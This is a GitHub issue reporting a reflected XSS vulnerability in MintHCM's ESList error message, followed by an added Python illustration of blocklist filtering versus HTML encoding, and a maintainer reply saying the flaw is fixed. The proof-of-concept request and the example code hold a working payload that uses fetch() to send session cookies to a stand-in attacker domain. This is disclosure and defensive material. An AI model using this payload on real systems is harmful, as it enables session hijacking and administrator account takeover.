Cross-site Scripting (XSS) Vulnerability #67

Closed
Sn1r opened this issue May 17, 2024 · 1 comment

Sn1r commented May 17, 2024

Description

A registered user in the system can execute arbitrary JavaScript code and thus achieve a reflected Cross-site Scripting (XSS) attack. This can result, for example, in stealing targeted users' session cookies (including admins') or redirecting them to download arbitrary files controlled by the attacker.

Steps to Reproduce

  1. Log in to the system as a regular user.
  2. Familiarize yourself with the HTTP requests and notice the error message returned from the "ESListViewController" action when an incorrect function name is inserted via the "function_name" parameter.
  3. Notice that when inserting HTML code into the "function_name" parameter value, several tags and events are escaped by the server, preventing the injection of arbitrary client-side code.
  4. Observe that when inserting specific tags, such as or , in conjunction with double less-than signs (<<) at the end, the HTML code is rendered successfully.
  5. Notice that some events, such as "onbeforeinput", are rendered as well, allowing the construction of a successful XSS payload using arbitrary client-side code. This crafted payload is responsible for stealing the targeted user's session cookie upon accessing the URL and pressing any key.
  6. The targeted user, who has the role of administrator, accesses the crafted URL, presses any key, and the session cookie is transferred to an attacker-controlled website automatically, without the admin's knowledge.
  7. The attacker gains complete access to the administrator account and performs further actions on the system, such as creating a new administrator account for persistent access and extracting sensitive information about the company.

Disclaimer

Although the exploitation requires user interaction, attackers can easily manipulate this. The severe consequences (such as session hijacking) occur without the victim's knowledge, making this attack vector highly viable. For example, an attacker can create a convincing form that tricks the victim into entering arbitrary characters. Since the URL appears legitimate and only a single character/action is needed for a successful attack, it is highly likely to succeed.

Proof of Concept Request and Response

Request:

GET /legacy/index.php?action=ESList&function_name=<div+id="xss"+contenteditable+onbeforeinput="fetch('http://attacker-controlled-domain.test/?c='%2bdocument['cookie']);"+autofocus>"<"< HTTP/1.1
Host: 192.168.146.150
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Origin: http://192.168.146.150
Referer: http://192.168.146.150/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; Users_divs=undefined%3D%23Users_aclroles_v%3Dtrue%23; Employees_divs=Employees_trainings_v%3Dfalse%23undefined%3D%23; ck_login_id_20=3b1edca5-cac6-e6d8-5fdb-663f40272a6d; ck_login_language_20=en_us; sugar_user_theme=SuiteP; PHPSESSID={{session}}
Connection: close

Response:

HTTP/1.1 200 OK
Date: Fri, 17 May 2024 10:16:35 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: ck_login_id_20=3b1edca5-cac6-e6d8-5fdb-663f40272a6d; expires=Thu, 15-Aug-2024 10:16:35 GMT; Max-Age=7776000; path=/; domain=192.168.146.150; HttpOnly
Set-Cookie: ck_login_language_20=en_us; expires=Thu, 15-Aug-2024 10:16:35 GMT; Max-Age=7776000; path=/; domain=192.168.146.150; HttpOnly
Set-Cookie: sugar_user_theme=SuiteP; expires=Sat, 17-May-2025 10:16:35 GMT; Max-Age=31536000; path=/; domain=192.168.146.150; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
X-Content-Encoding-Over-Network: gzip
Content-Length: 203

Class does not have function: ESListViewController-><div id="xss" contenteditable onbeforeinput="fetch('http://attacker-controlled-domain.test/?c='+document['cookie']);" autofocus>"&lt;"&lt;
Attachments: Screenshot_7, PoC-alert.mp4, PoC-stealing-cookies.mp4

Impact

Gain complete access to the system with an administrator account or any other user of the attacker's choice.

Recommendations

  1. Ensure that user-generated content undergoes HTML encoding before display, which neutralizes any potentially harmful scripts.
  2. Use the HttpOnly attribute for cookies, which prevents client-side scripts from accessing them, thereby preventing XSS attacks targeting session data theft or manipulation.
  3. Implement Content Security Policies (CSPs), which define approved sources for content loading, limiting the execution of malicious scripts injected by attackers.

References

https://cwe.mitre.org/data/definitions/79.html
https://portswigger.net/web-security/cross-site-scripting
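As an added illustration (not code from the report and not MintHCM's own code), the following Python contrasts the two server behaviours the report describes: a tag/event blocklist that escapes some markup but lets the `<div ... onbeforeinput=...>` payload through, and full HTML encoding of the reflected `function_name` value as in recommendation 1. The blocklist and its tag/event lists are a hypothetical stand-in for the partial escaping the reporter observed (the real filter is not shown on this page); the payload string is copied from the PoC request above, and the CSP value is one that satisfies recommendation 3 by omitting `'unsafe-inline'`, which is what keeps an injected inline handler from running.

```python
"""Added example: blocklist escaping vs. full HTML encoding of a reflected
query parameter. The blocklist is a hypothetical model, not MintHCM's code."""
import html
import re
from urllib.parse import unquote_plus

# Constructed from the PoC request in the report: the raw query-string
# value of function_name, decoded the way the server would see it.
RAW_QUERY_VALUE = (
    '<div+id="xss"+contenteditable+onbeforeinput="fetch('
    "'http://attacker-controlled-domain.test/?c='%2bdocument['cookie']);\""
    '+autofocus>"<"<'
)
PAYLOAD = unquote_plus(RAW_QUERY_VALUE)

# Hypothetical blocklist (assumption): escapes a handful of well-known tags
# and event handlers, approximating the partial escaping in steps 3-5.
BLOCKED_TAGS = ("script", "img", "iframe", "svg", "object", "embed")
BLOCKED_EVENTS = ("onload", "onerror", "onclick", "onmouseover", "onfocus")


def blocklist_filter(value: str) -> str:
    """Neutralise only the listed tags/handlers; everything else passes."""
    for tag in BLOCKED_TAGS:
        # Turn "<script" / "</script" into "&lt;script" / "&lt;/script".
        value = re.sub(rf"<(?=/?\s*{tag}\b)", "&lt;", value, flags=re.IGNORECASE)
    for ev in BLOCKED_EVENTS:
        # Drop ` onerror="..."`, ` onerror='...'` or ` onerror=bare` attributes.
        value = re.sub(
            rf"\s{ev}\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s>]+)", "", value, flags=re.IGNORECASE
        )
    return value


def encode_for_html(value: str) -> str:
    """Context-correct fix for text reflected into an HTML body: encode
    <, >, &, " and '. PHP equivalent for a project like this one:
    htmlspecialchars($v, ENT_QUOTES | ENT_HTML5, 'UTF-8')."""
    return html.escape(value, quote=True)


# Error message format taken from the PoC response body.
ERROR_TEMPLATE = "Class does not have function: ESListViewController->{}"


def render_error_vulnerable(function_name: str) -> str:
    """Reflects the parameter after blocklist filtering only."""
    return ERROR_TEMPLATE.format(blocklist_filter(function_name))


def render_error_fixed(function_name: str) -> str:
    """Reflects the parameter fully HTML-encoded (recommendation 1)."""
    return ERROR_TEMPLATE.format(encode_for_html(function_name))


def has_live_markup(rendered: str) -> bool:
    """True if the body still contains something an HTML parser treats as a
    start tag, which is the only place an on* handler can fire from."""
    return re.search(r"<[a-z]", rendered, re.IGNORECASE) is not None


def content_security_policy() -> str:
    """Header for recommendation 3. With no 'unsafe-inline' in script-src,
    an injected inline handler such as onbeforeinput= is blocked by the
    browser even if the encoding fix is missed somewhere."""
    return "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"


if __name__ == "__main__":
    for label, body in (
        ("vulnerable", render_error_vulnerable(PAYLOAD)),
        ("fixed", render_error_fixed(PAYLOAD)),
    ):
        print(f"{label}: live markup={has_live_markup(body)}\n  {body}")
    print("Content-Security-Policy:", content_security_policy())
```

Running it shows the blocklisted version still emitting `<div id="xss" contenteditable onbeforeinput=...>` verbatim, while the encoded version reflects `&lt;div id=&quot;xss&quot; ...`, which the browser renders as text. The blocklist does catch `<img src=x onerror=...>`, which is exactly why such filters look effective under light testing and fail against the next tag or event name.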

MintHCM-admin (Collaborator) commented May 20, 2024

Thank you very much for your report! We fixed it in version 4.0.3.1, which is available now. Let us know if you run into any more problems.
